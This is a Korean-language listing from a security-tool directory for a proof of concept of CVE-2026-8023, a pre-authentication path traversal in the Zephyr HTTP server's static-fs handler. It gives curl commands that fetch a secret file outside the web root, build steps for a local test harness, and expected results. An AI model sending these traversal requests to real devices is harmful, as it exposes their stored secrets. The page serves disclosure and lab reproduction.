Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-8023 — PoC for CVE-2026-8023: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') | Kitploit
도구/GitHubGitHub/ret2c/cve-2026-8023
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHubret2c/cve-2026-8023

CVE-2026-8023

PoC for CVE-2026-8023: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2026-8023 — Zephyr HTTP static-fs 경로 탐색 (PoC)

Zephyr HTTP 서버 static-fs 핸들러(subsys/net/lib/http)의 사전 인증 경로 탐색으로, 와일드카드 리소스 매칭(CONFIG_HTTP_SERVER_RESOURCE_WILDCARD=y)이 HTTP_RESOURCE_TYPE_STATIC_FS와 함께 사용될 때 발생합니다. HTTP/1.1 및 HTTP/2 모두에 영향을 미칩니다.

GHSA: GHSA-hch3-53g6-jj3h

  • 영향받는 버전: >= 4.0.0, < 4.3.1; >= 4.4.0, < 4.4.2
  • 확인된 대상: b93e61d02d5cd08d2fc559feb0253f9de3491777 (v4.4.0-rc1-32-gb93e61d02d5)
  • 도입된 커밋: e55278a87be4e5534ba772b23e459882866bcd6d (2024-07-31)
  • 수정 커밋: zephyrproject-rtos/zephyr#108531
root@kitploit:~
curl --http1.1 --path-as-is -i "http://$URL/www/../device.env"
curl --http2-prior-knowledge --path-as-is -i "http://$URL/www/../device.env"

재현

root@kitploit:~
git clone https://github.com/zephyrproject-rtos/zephyr.git
cd zephyr && git checkout b93e61d02d5cd08d2fc559feb0253f9de3491777 && cd ..
west init -l zephyr
west update

# Copy the contents of this repo's pocs/ into zephyr/pocs/
docker build -f zephyr/pocs/Dockerfile.native-sim -t zephyr-httpfs-zdi .
docker run --rm -it -v "$PWD":/work -w /work zephyr-httpfs-zdi bash

# Inside container:
west build -p always -b native_sim/native/64 \
    zephyr/pocs/http_static_fs_native_sim \
    -- -DEXTRA_DTC_OVERLAY_FILE=ramdisk.overlay
./build/zephyr/zephyr.exe

하네스는 LittleFS 이미지를 마운트하고, 웹 루트 /littlefs/www/ 외부의 /littlefs/device.env에 비밀을 기록하며, 와일드카드 static-fs 라우트를 노출한 후, 네 개의 루프백 요청을 발행합니다:

도구 다운로드
검사요청예상
HTTP1_GLOB_TRAVERSALGET /www/../device.env (HTTP/1.1)200 + 비밀
HTTP1_ENCODED_TRAVERSALGET /www/%2e%2e/device.env (HTTP/1.1)404 (디코딩 없음)
HTTP2_GLOB_TRAVERSAL:path = /www/../device.env (HTTP/2)비밀 바이트
HTTP2_ENCODED_TRAVERSAL:path = /www/%2e%2e/device.env (HTTP/2)비밀 없음